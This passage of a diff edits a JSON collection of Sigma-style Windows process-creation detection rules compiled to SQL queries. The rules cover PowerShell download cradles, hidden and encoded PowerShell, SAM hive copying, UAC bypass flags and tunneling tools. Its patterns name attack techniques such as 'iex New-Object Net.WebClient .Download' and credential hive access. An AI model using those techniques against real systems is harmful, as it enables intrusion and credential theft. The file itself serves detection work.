Description LIKE 'pwsh%' ESCAPE '\\') OR (OriginalFileName LIKE 'powershell.exe' ESCAPE '\\' OR OriginalFileName LIKE 'pwsh.dll' ESCAPE '\\' OR OriginalFileName LIKE 'powershell\\_ise.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.c' ESCAPE '\\' OR OriginalFileName LIKE 'psexesvc.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'mshta.exe' ESCAPE '\\' OR OriginalFileName LIKE 'regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wmic.exe' ESCAPE '\\' OR OriginalFileName LIKE 'certutil.exe' ESCAPE '\\' OR OriginalFileName LIKE 'rundll32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cmstp.exe' ESCAPE '\\' OR OriginalFileName LIKE 'msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'reg.exe' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\psexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\psexec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PSEXESVC.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%nslookup%' ESCAPE '\\' AND CommandLine LIKE '%\\_ldap.\\_tcp.dc.\\_msdcs.%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_binary_highly_relevant.yml" + "filename": "proc_creation_win_nslookup_domain_discovery.yml" }, { - "title": "Explorer NOUACCHECK Flag", - "id": "534f2ef7-e8a2-4433-816d-c91bccde289b", + "title": "MSExchange Transport Agent Installation", + "id": "83809e84-4475-4b69-bc3e-4aad8568612f", "status": "test", - "description": "Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the Installation of a Exchange Transport Agent", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1548.002" + "attack.persistence", + "attack.t1505.002" ], "falsepositives": [ - "Domain Controller User Logon", - "Unknown how many legitimate software products use that method" + "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' AND CommandLine LIKE '%/NOUACCHECK%' ESCAPE '\\') AND NOT ((ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Install-TransportAgent%' ESCAPE '\\')" ], - "filename": "proc_creation_win_explorer_nouaccheck.yml" + "filename": "proc_creation_win_powershell_msexchange_transport_agent.yml" }, { - "title": "New Process Created Via Wmic.EXE", - "id": "526be59f-a573-4eea-b5f7-f0973207634d", + "title": "Suspicious Cabinet File Expansion", + "id": "9f107a84-532c-41af-b005-8d12a607639f", "status": "test", - "description": "Detects new process creation using WMIC via the \"process call create\" flag", - "author": "Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community", + "description": "Adversaries can use the built-in expand utility to decompress cab files as seen in recent Iranian MeteorExpress attack", + "author": "Bhabesh Raj", "tags": [ "attack.execution", - "attack.t1047", - "car.2016-03-002" + "attack.t1218" ], "falsepositives": [ - "Unknown" + "System administrator Usage" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%process%' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\expand.exe' ESCAPE '\\' AND (CommandLine LIKE '%.cab%' ESCAPE '\\' OR CommandLine LIKE '%/F:%' ESCAPE '\\' OR CommandLine LIKE '%-F:%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Temp\\\\%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\UpdateService\\\\ServiceShell.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Dell\\\\UpdateService\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_process_creation.yml" + "filename": "proc_creation_win_expand_cabinet_files.yml" }, { - "title": "Winrar Compressing Dump Files", - "id": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", + "title": "Abuse of Service Permissions to Hide Services Via Set-Service", + "id": "514e4c3a-c77d-4cde-a00f-046425e2301e", "status": "experimental", - "description": "Detects a suspicious winrar execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Legitimate use of WinRAR with a command line in which .dmp appears accidentally" + "Rare intended use of hidden services" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rar.exe' ESCAPE '\\' OR Image LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_winrar_dmp.yml" + "filename": "proc_creation_win_powershell_hide_services_via_set_service.yml" }, { - "title": "Remote Access Tool - AnyDesk Silent Installation", - "id": "114e7f1c-f137-48c8-8f54-3088c24ce4b9", - "status": "test", - "description": "Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.", - "author": "Ján Trenčanský", + "title": "PUA - NPS Tunneling Tool Execution", + "id": "68d37776-61db-42f5-bf54-27e87072d17e", + "status": "experimental", + "description": "Detects the use of NPS, a port forwarding and intranet penetration proxy server", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.command_and_control", - "attack.t1219" + "attack.t1090" ], "falsepositives": [ - "Legitimate deployment of AnyDesk" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%--install%' ESCAPE '\\' AND CommandLine LIKE '%--start-with-win%' ESCAPE '\\' AND CommandLine LIKE '%--silent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\npc.exe' ESCAPE '\\' OR (CommandLine LIKE '% -server=%' ESCAPE '\\' AND CommandLine LIKE '% -vkey=%' ESCAPE '\\' AND CommandLine LIKE '% -password=%' ESCAPE '\\') OR CommandLine LIKE '% -config=npc%' ESCAPE '\\' OR ((Hashes LIKE '%MD5=AE8ACF66BFE3A44148964048B826D005%' ESCAPE '\\' OR Hashes LIKE '%SHA1=CEA49E9B9B67F3A13AD0BE1C2655293EA3C18181%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5A456283392FFCEEEACA3D3426C306EB470304637520D72FED1CC1FEBBBD6856%' ESCAPE '\\') OR md5 = 'ae8acf66bfe3a44148964048b826d005' OR sha1 = 'cea49e9b9b67f3a13ad0be1c2655293ea3c18181' OR sha256 = '5a456283392ffceeeaca3d3426c306eb470304637520d72fed1cc1febbbd6856')))" ], - "filename": "proc_creation_win_remote_access_tools_anydesk_silent_install.yml" + "filename": "proc_creation_win_pua_nps.yml" }, { - "title": "Always Install Elevated MSI Spawned Cmd And Powershell", - "id": "1e53dd56-8d83-4eb4-a43e-b790a05510aa", - "status": "test", - "description": "Detects Windows Installer service (msiexec.exe) spawning \"cmd\" or \"powershell\"", - "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", + "title": "Suspicious PowerShell Invocations - Specific - ProcessCreation", + "id": "536e2947-3729-478c-9903-745aaffe60d2", + "status": "experimental", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll')) AND (ParentImage LIKE '%\\\\Windows\\\\Installer\\\\%' ESCAPE '\\' AND ParentImage LIKE '%msi%' ESCAPE '\\' AND ParentImage LIKE '%tmp' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%-nop%' ESCAPE '\\' AND CommandLine LIKE '% -w %' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '% -c %' ESCAPE '\\' AND CommandLine LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (CommandLine LIKE '% -w %' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '%-noni%' ESCAPE '\\' AND CommandLine LIKE '%-nop%' ESCAPE '\\' AND CommandLine LIKE '% -c %' ESCAPE '\\' AND CommandLine LIKE '%iex%' ESCAPE '\\' AND CommandLine LIKE '%New-Object%' ESCAPE '\\') OR (CommandLine LIKE '% -w %' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '%-ep%' ESCAPE '\\' AND CommandLine LIKE '%bypass%' ESCAPE '\\' AND CommandLine LIKE '%-Enc%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%\\\\software\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%bypass%' ESCAPE '\\' AND CommandLine LIKE '%-noprofile%' ESCAPE '\\' AND CommandLine LIKE '%-windowstyle%' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '%new-object%' ESCAPE '\\' AND CommandLine LIKE '%system.net.webclient%' ESCAPE '\\' AND CommandLine LIKE '%.download%' ESCAPE '\\') OR (CommandLine LIKE '%iex%' ESCAPE '\\' AND CommandLine LIKE '%New-Object%' ESCAPE '\\' AND CommandLine LIKE '%Net.WebClient%' ESCAPE '\\' AND CommandLine LIKE '%.Download%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_elavated_msi_spawned_shell.yml" + "filename": "proc_creation_win_powershell_invocation_specific.yml" }, { - "title": "Replace.exe Usage", - "id": "9292293b-8496-4715-9db6-37028dcda4b3", + "title": "Wusa Extracting Cab Files From Suspicious Paths", + "id": "c74c0390-3e20-41fd-a69a-128f0275a5ea", "status": "experimental", - "description": "Detects the use of Replace.exe which can be used to replace file with another file", - "author": "frack113", + "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument from suspicious paths", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\replace.exe' ESCAPE '\\' AND (CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wusa.exe' ESCAPE '\\' AND CommandLine LIKE '%/extract:%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_replace.yml" + "filename": "proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml" }, { - "title": "Cmd.EXE Missing Space Characters Execution Anomaly", - "id": "a16980c2-0c56-4de0-9a79-17971979efdd", - "status": "experimental", - "description": "Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.\nThis could be a sign of obfuscation of a fat finger problem (typo by the developer).\n", + "title": "Potential PowerShell Obfuscation Via WCHAR", + "id": "e312efd0-35a1-407f-8439-b8d434b438a6", + "status": "test", + "description": "Detects suspicious encoded character syntax often used for defense evasion", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%cmd.exe/c%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/k%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/r%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/r%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/r%' ESCAPE '\\') OR (CommandLine LIKE '%/cwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/cpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/cschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/cbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/ccertutil%' ESCAPE '\\' OR CommandLine LIKE '%/kwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/kpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/kschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/kbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/kcertutil%' ESCAPE '\\') OR (CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\')) OR (CommandLine LIKE '%AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\resources\\\\app\\\\node\\_modules%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/c .' ESCAPE '\\' OR CommandLine = 'cmd.exe /c')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%(WCHAR)0x%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_no_space_execution.yml" + "filename": "proc_creation_win_powershell_obfuscation_via_utf8.yml" }, { - "title": "PowerShell SAM Copy", - "id": "1af57a4b-460a-4738-9034-db68b880c665", + "title": "Psexec Execution", + "id": "730fc21b-eaff-474b-ad23-90fd265d4988", "status": "test", - "description": "Detects suspicious PowerShell scripts accessing SAM hives", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects user accept agreement execution in psexec commandline", + "author": "omkar72", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.execution", + "attack.t1569", + "attack.t1021" ], "falsepositives": [ - "Some rare backup scenarios", - "PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs" + "Administrative scripts." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND CommandLine LIKE '%System32\\\\config\\\\sam%' ESCAPE '\\' AND (CommandLine LIKE '%Copy-Item%' ESCAPE '\\' OR CommandLine LIKE '%cp $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%cpi $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%copy $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%.File]::Copy(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\psexec.exe' ESCAPE '\\' OR OriginalFileName = 'psexec.c'))" ], - "filename": "proc_creation_win_powershell_sam_access.yml" + "filename": "proc_creation_win_sysinternals_psexec_execution.yml" }, { - "title": "Powershell ChromeLoader Browser Hijacker", - "id": "27ba3207-dd30-4812-abbf-5d20c57d474e", - "status": "experimental", - "description": "Detects PowerShell process spawning a 'chrome.exe' process with the 'load-extension' flag to start a new chrome instance with custom extensions, as seen being used in 'ChromeLoader'", - "author": "Aedan Russell, frack113 (sigma)", + "title": "Data Copied To Clipboard Via Clip.EXE", + "id": "ddeff553-5233-4ae9-bbab-d64d2bd634be", + "status": "test", + "description": "Detects the execution of clip.exe in order to copy data to the clipboard. Adversaries may collect data stored in the clipboard from users copying information within or between applications.", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1176" + "attack.collection", + "attack.t1115" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\chrome.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%--load-extension=%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\clip.exe' ESCAPE '\\' OR OriginalFileName = 'clip.exe'))" ], - "filename": "proc_creation_win_browsers_chrome_load_extension.yml" + "filename": "proc_creation_win_clip_execution.yml" }, { - "title": "Suspicious Sysmon as Execution Parent", - "id": "6d1058a4-407e-4f3a-a144-1968c11dc5c3", + "title": "Potential Signing Bypass Via Windows Developer Features", + "id": "a383dec4-deec-4e6e-913b-ed9249670848", "status": "experimental", - "description": "Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)", - "author": "Florian Roth (Nextron Systems), Tim Shelton (fp werfault)", + "description": "Detects when a user enable developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\Sysmon.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\Sysmon64.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\Sysmon.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\' OR Image LIKE 'wevtutil.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\WerFault.exe' ESCAPE '\\') OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Sysmon.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SystemSettingsAdminFlows.exe' ESCAPE '\\' OR OriginalFileName = 'SystemSettingsAdminFlows.EXE') AND CommandLine LIKE '%TurnOnDeveloperFeatures%' ESCAPE '\\' AND (CommandLine LIKE '%DeveloperUnlock%' ESCAPE '\\' OR CommandLine LIKE '%EnableSideloading%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml" + "filename": "proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml" }, { - "title": "PUA - CsExec Execution", - "id": "d08a2711-ee8b-4323-bdec-b7d85e892b31", + "title": "Weak or Abused Passwords In CLI", + "id": "91edcfb1-2529-4ac2-9ecc-7617f895c7e4", "status": "experimental", - "description": "Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. An example would be a threat actor creating a new user via the net command and providing the password inline", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587.001", - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate usage of the passwords by users via commandline (should be discouraged)", + "Other currently unknown false positives" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\csexec.exe' ESCAPE '\\' OR Description = 'csexec'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Asd123.aaaa%' ESCAPE '\\' OR CommandLine LIKE '%password123%' ESCAPE '\\' OR CommandLine LIKE '%123456789%' ESCAPE '\\' OR CommandLine LIKE '%P@ssw0rd!%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_csexec.yml" + "filename": "proc_creation_win_susp_weak_or_abused_passwords.yml" }, { - "title": "Sdiagnhost Calling Suspicious Child Process", - "id": "f3d39c45-de1a-4486-a687-ab126124f744", - "status": "experimental", - "description": "Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)", - "author": "Nextron Systems", + "title": "Execution via WorkFolders.exe", + "id": "0bbc6369-43e3-453d-9944-cae58821c173", + "status": "test", + "description": "Detects using WorkFolders.exe to execute an arbitrary control.exe", + "author": "Maxime Thiebaut (@0xThiebaut)", "tags": [ "attack.defense_evasion", - "attack.t1036", "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate usage of the uncommon Windows Work Folders feature." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\calc.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\control.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\WorkFolders.exe' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sdiagnhost_susp_child.yml" + "filename": "proc_creation_win_susp_workfolders.yml" }, { - "title": "Remote Access Tool - ScreenConnect Suspicious Execution", - "id": "75bfe6e6-cd8e-429e-91d3-03921e1d7962", + "title": "Suspicious Plink Port Forwarding", + "id": "48a61b29-389f-4032-b317-b30de6b95314", "status": "test", - "description": "Detects ScreenConnect program starts that establish a remote access to that system (not meeting, not remote support)", + "description": "Detects suspicious Plink tunnel port forwarding to a local port", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001" ], "falsepositives": [ - "Legitimate use by administrative staff" + "Administrative activity using a remote port forwarding to a local port" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%e=Access&%' ESCAPE '\\' AND CommandLine LIKE '%y=Guest&%' ESCAPE '\\' AND CommandLine LIKE '%&p=%' ESCAPE '\\' AND CommandLine LIKE '%&c=%' ESCAPE '\\' AND CommandLine LIKE '%&k=%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Description = 'Command-line SSH, Telnet, and Rlogin client' AND CommandLine LIKE '% -R %' ESCAPE '\\')" ], - "filename": "proc_creation_win_remote_access_tools_screenconnect_access.yml" + "filename": "proc_creation_win_plink_port_forwarding.yml" }, { - "title": "PowerShell Get-Clipboard Cmdlet Via CLI", - "id": "b9aeac14-2ffd-4ad3-b967-1354a4e628c3", + "title": "HackTool - PurpleSharp Execution", + "id": "ff23ffbc-3378-435e-992f-0624dcf93ab4", "status": "test", - "description": "Detects usage of the 'Get-Clipboard' cmdlet via CLI", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of the PurpleSharp adversary simulation tool", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1115" + "attack.t1587", + "attack.resource_development" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Get-Clipboard%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\purplesharp%' 